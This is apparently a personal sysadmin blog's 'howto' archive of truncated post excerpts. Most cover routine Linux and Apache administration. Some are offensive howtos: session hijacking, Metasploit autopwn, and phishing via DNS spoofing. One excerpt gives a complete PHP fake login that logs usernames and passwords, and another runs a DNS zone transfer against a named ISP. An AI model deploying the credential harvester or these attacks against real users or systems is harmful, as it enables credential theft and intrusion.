//
archives

howto

This category contains 26 posts

Web based Session Hijacking attacks

Session Hijacking involves that the interceptor has used Man-in-the-middle attack to steal session dependent attributes (like cookies) of an unsuspecting user who logins in to a web site so as to get unauthorised access and browse private content. I don’t encourage computer hacking as it is ilegal, but I write this article for educational purposes … Continue reading

Using m0n0wall to Create a WiFi Captive Portal

  m0n0wall, is a very powereful firewall based on FreeBSD. For the Captive Portal setup, i used ; 1. a diskless PC with 2xethernet ports 2. an Access Point 3. a Broadband ADSL+2 router 4. a switch 5. a compact flash card (from my canon ixus:) 6. my linux laptop to flash the image on … Continue reading

Linux & ZTE MF680 – 3G NW HSPA+ Wireless Modem

COSMOTE’s Internet On The Go 3G Service promises High Speed mobile Internet (42,2 Mbps downlink 5,8 Mbps uplink) See just below my setup ; root@pilio-laptop:~# cat /etc/wvdial.conf [Dialer Defaults] Init1 = ATZ Init2 = ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 Init3 = AT+CGDCONT=1,”IP”,”internet” Modem Type = Analog Modem Baud = 42000000 New PPPD = … Continue reading

How to Increase the Entropy in Linux

The Linux Kernel generates entropy from keyboard timings, mouse movements and IDE timings and makes the random character data available to other operating system processes through the special files /dev/random and /dev/urandom. On my laptop the Entropy is around 178. Many times i have got the following message when i try to generate a security … Continue reading

Green Technology – Computing

You want to save money on Electricity? Use Green Technology! I have successfully implemented the Wake-On-LAN standard over Internet. Now you don’t need to leave your computer on continuously so that you are able to access it remotely. I can help you conserve energy and save money as well. How it Works; … In the … Continue reading

How to use metasploit framework

This is for Educational Purposes only !! This Howto shows how to gain access on a remote PC (windows XP Pro SP2) exploiting a known Vulnerability bug with autopwn tool. Installation Howto (ubuntu) $ sudo apt-get install ruby libopenssl-ruby libyaml-ruby libdl-ruby libiconv-ruby $ sudo apt-get install libreadline-ruby irb ri rubygems $ sudo apt-get install subversion … Continue reading

How Phishing Works along with Dns Spoofing

This is for Educational Purposes Only!! This post describes how Phishing works. Many howtos exist on Internet but dont do the job silently and the victim understands that something goes wrong … Attacker’s Side IP: 192.168.1.4 1. install ettercap 2. install Apache with php support 3. Make sure with ping command that facebook.com points to 192.168.1.4 or … Continue reading

Opensource IT Security Solutions

Implementation of SSO (Single-Sign-On) procedures according to ADAE’s Requirements for Telcos, ISPs, Banks, etc. SSO Apache Authentication Against Active Directory, SSO Proxy Squid Authentication Against Active Directory, SSO vsftpd Authentication Against Active Directory. Web Content Filtering and Anti Virus Services. Integration of OpenSSH with OpenLDAP, Kerberos, Active Directory standards (SSO) with full logging and replay … Continue reading

How to Authenticate against Facebook using Perl

#!/usr/bin/perl -w #How to Authenticate against Facebook using Perl #coded by Panagiotis Iliopoulos 20/2/2011 #apt-get install libcrypt-ssleay-perl use strict; use LWP::UserAgent; use HTTP::Cookies; my $fname=”fbkCookies.dat”; if (-e $fname) { unlink $fname;} my $email=”user@domain name”; my $password=”yourpassword”; my $user_agent = ‘Mozilla/5.0 (Linux; U; Android 2.2; en-us; Ideos Build/FRF91) AppleWebKit/533.1 Mobile Safari/533.1’; my %postLoginData=(        … Continue reading

The Web Server is not sending the required intermediate certificate through a SECURE HTTPS Session

Some System admins forget to configure the intermediate Certificate and the SSL handshake between browser and Web Server returns ; Verify return code: 21 (unable to verify the first certificate) and not Verify return code: 0 (ok) # openssl s_client -connect http://www.vivodi.gr:443 -state New, TLSv1/SSLv3, Cipher is DHE-RSA-AES256-SHA Server public key is 1024 bit SSL-Session: … Continue reading

A Simple PHP Authenticator which logs users’ usernames and passwords

<?php if (!isset($_SERVER[‘PHP_AUTH_USER’])) { header(‘WWW-Authenticate: Basic realm=”Restricted Area”‘); header(‘HTTP/1.0 401 Unauthorized’); echo ‘401 Unauthorized’; exit; } else { $a=$_SERVER[‘PHP_AUTH_USER’]; $b=$_SERVER[‘PHP_AUTH_PW’]; $myFile = “./testFile.txt”; $fh = fopen($myFile, ‘a’) or die(“ferror!!!”); fwrite($fh, $a); fwrite($fh,”\n”); fwrite($fh, $b); fwrite($fh,”\n”); fwrite($fh,”——————-\n”); fclose($fh); header(‘WWW-Authenticate: Basic realm=”Restricted Area”‘); header(‘HTTP/1.0 401 Unauthorized’); echo ‘401 Unauthorized’; exit; } ?> # tail -f testFile.txt ——————- … Continue reading

Installation of SUN JAVA Under RHEL

0. Download JAVA and Run the InstallerJava can be downloaded through http://java.sun.com/products/archive/ link # cd /opt# chmod +x jdk-6u11-linux-x64.bin# script -a jdk_installation.txt# ./jdk-6u11-linux-x64.bin# exit 1.# rm /usr/bin/java2.# test -L /usr/local/java && mv /usr/local/java /usr/local/java_orig_system3.# find /usr/local -maxdepth 1 -type d -name “j2sdk*” -exec rm -r {} \;4.# find /usr/local -maxdepth 1 -type d -name “jdk?.*” … Continue reading

Using Pen, mod_rewrite and mod_proxy Apache modules to perform selective url based loadbalancing/fail-over with “n” backend servers

1.Download Pen through the following link ; http://siag.nu/pen/ 2.raise the file descriptor limits by editing the /usr/include/linux/posix_types.h and /usr/include/bits/typesizes.h as follows ; change : #define __FD_SETSIZE 1024 to : #define __FD_SETSIZE 10240 and then compile Pen 3. Launch Pen as follows; ./pen -x 5000 -d -d -f 8280 server1:8280 server2:8280 4. Apache Configuration RewriteEngine on … Continue reading

SUN’s JES (DSSE, Access Manager) Prerequisite Linux Packages

Prerequisites ; 1) pam-devel.i386 2) pam.i386 3) compat-libstdc++-33.i386 4) libgcc.i386 5) zlib.i386 1. yum install pam-devel.i386 Dependencies Resolved ========================================================================== Package Arch Version Repository Size ========================================================================== Installing: pam-devel i386 0.77-66.25 myrepo 85 k Transaction Summary ========================================================================== 2.yum install pam.i386 Dependencies Resolved ========================================================================== Package Arch Version Repository Size ========================================================================== Installing: pam i386 0.77-66.25 myrepo 1.9 M Installing for dependencies: … Continue reading

How to create a Local YUM Repository for RHEL 5.3 , RHAS 4.7

1. Local YUM Repository for RHEL 5.3 # cd /etc/yum.repos.d # cat iso.repo [myrepo] name=myrepo baseurl=file:///mnt enabled=1 gpgcheck=0 # # mkdir /mnt/RHEL5.3 # cd /root/myrepo/ # mount -o loop /root/myrepo/rhel-server-5.3-x86_64-dvd.iso /mnt/RHEL5.3 # rpm -Uvh createrepo* warning: createrepo-0.4.8-1.el5.rf.noarch.rpm: Header V3 DSA signature: NOKEY, key ID 6b8d79e6 Preparing… ########################################### [100%] 1:createrepo ########################################### [100%] # # cd /mnt/ … Continue reading

Apache seems to be eating RAM – How to reduce the memory footprint of apache using an alternative Apache other than Linux’s Pre-Packaged

#./configure \ –with-included-apr \ –prefix=/opt/apache_worker \ –with-mpm=worker –enable-so \ –enable-unique-id \ –enable-proxy –enable-proxy-http –enable-proxy-ftp \ –enable-proxy-ajp –enable-proxy-balancer \ –enable-rewrite –enable-headers –enable-setenvif \ –enable-logio \ –enable-expires \ –enable-ssl \ –enable-deflate –enable-cache –enable-file-cache –enable-mem-cache –enable-disk-cache \ –disable-autoindex –disable-asis –disable-cgi –disable-cgid \ –disable-negotiation –disable-userdir #make && make install

MySQL Driven Apache NCSA Log Parser – Linux Ansi C (gcc)

mysql> desc apacheLog; +———+————–+——+—–+———+——-+ | Field | Type | Null | Key | Default | Extra | +———+————–+——+—–+———+——-+ | myDATE | datetime | NO | | NULL | | | hosts | varchar(255) | NO | | NULL | | | method | char(4) | NO | | NULL | | | url | varchar(255) … Continue reading

Encrypted Volumes under Linux / Windows

1. Under Linux use the following procedure ; # modprobe aes # modprobe twofish # modprobe cryptoloop # mkdir $HOME/crypto #dd if=/dev/urandom of=$HOME/crypto/container.aes bs=1k count=102400 # LOOPDEV=$( losetup -f ) # echo “Our loop device is ‘$LOOPDEV'” # losetup -e aes $LOOPDEV $HOME/crypto/container.aes    (insert a strong passphrase) # mkfs.ext3 -m 0 $LOOPDEV # tune2fs -i … Continue reading

How to transmit/receive ASCII/BINARY data between 2 hosts using netcat and file descriptors

//Server Side// [root@node1]# nc -l -p 8080 -vvvvv listening on [any] 8080 … //Client Side// [root@node2]# exec 5/dev/tcp/192.168.1.67/8080 [root@node2]# echo “this is a test” >&5 [root@node2]# echo “this is a test” |openssl base64 -e >&5

keepalived with VRRP and LVS Support under RHEL 5.3 x86_64

# yum -y install kernel-devel # yum install openssl-devel # wget http://www.keepalived.org/software/keepalived-1.1.17.tar.gz # wget http://www.kernel.org/pub/linux/kernel/v2.6/linux-2.6.18.8.tar.gz # tar zxvf linux-2.6.18.8.tar.gz # cp -r linux-2.6.18.8/net/core /lib/modules/2.6.18-128.el5/build/net/ # ./configure –with-kernel-dir=/lib/modules/2.6.18-128.el5/build Keepalived configuration ———————— Keepalived version : 1.1.17 Compiler : gcc Compiler flags : -g -O2 Extra Lib : -lpopt -lssl -lcrypto Use IPVS Framework : Yes IPVS sync … Continue reading

Authenicate Apache Against Active Directory (SSO) – Eponymous LDAP Bind

// Apache Module // LoadModule authz_ldap_module modules/mod_authz_ldap.so // Apache Module // [Directory “/var/www/html”] AuthType Basic # What the users will see as a “title” of the login prompt: AuthName “Domain Credentials Required” # use plain LDAP authentication: AuthzLDAPMethod ldap # FQDN resolvable hostname (or IP) of the Windows # AD domain controller: AuthzLDAPServer 192.168.1.67 # … Continue reading

Authenticate SQUID PROXY against Active Directory (SSO)

Prerequisites; 1) Samba / Winbind sw 2) Kerberos Libraries 3) System is joined to the Active Directory 4) Squid Package Squid configuration; auth_param ntlm program /usr/bin/ntlm_auth –helper-protocol=squid-2.5-ntlmssp auth_param ntlm children 30 auth_param ntlm max_challenge_reuses 0 auth_param ntlm max_challenge_lifetime 2 minutes auth_param ntlm use_ntlm_negotiate on auth_param basic program /usr/bin/ntlm_auth –helper-protocol=squid-2.5-basic auth_param basic children 5 auth_param basic … Continue reading

Apache PKI Implementation

#openssl pkcs12 -clcerts -export -inkey server.key -in server.crt -out clientKey.p12 #openssl pkcs12 -clcerts -nokeys -in clientKey.p12 -out CA_pilio.crt.pem #cp CA_pilio.crt.pem CA_pilio.crt // Apache SSL Configuration // SSLVerifyClient require SSLVerifyDepth 1 SSLCACertificateFile /etc/pki/tls/certs/CA_pilio.crt // Apache SSL Configuration // clientKey.p12 client SSL Key must be loaded in your web browser

How to fetch user’s SMIME cerificate (Public Key) from Active Directory (eponymous bind) using Perl

#!/usr/bin/perl use Net::LDAP; use IO::File; binmode STDOUT; my $CREATE_CERT = new IO::File “> /tmp/mycert.cer”; $ldap = Net::LDAP->new(‘10.20.0.145’) or die “Could not connect: $@”; $result = $ldap->bind(‘CN= bind_usr ,OU=System Administrators,OU=Project Management & Support Dpt,OU=Systems Technical Division,OU=EMPLOYEES,DC=CONTOSO,DC=MSFT’,password =>’mypass’); die $result->error if $result->code; # do stuff $search = $ldap->search(base=>’OU=EMPLOYEES,DC=CONTOSO,DC=MSFT‘,scope=>’subtree’,filter=>'(&(objectclass=user)(objectcategory=Person))’); die $search->error if $search->code; print “Total entries returned: “,$search->count,”\n”; … Continue reading

HOL GREEK ISP – DNS Misconfiguration Issue

It seems that HOL is Vulnerable to DNS AXFR Zone transfer for Primary, secondary and Tertiary Domain Zones (forward / reverse zones) from unauthorized IP networks.! # dig @ns1.hol.gr hol.gr -t AXFR ; <> DiG 9.5.1-P2 <> @ns1.hol.gr hol.gr -t AXFR ; (1 server found) ;; global options: printcmd hol.gr. 7200 IN SOA ns0.hol.gr. hostmaster.hol.gr. … Continue reading

sample integrations

Samples …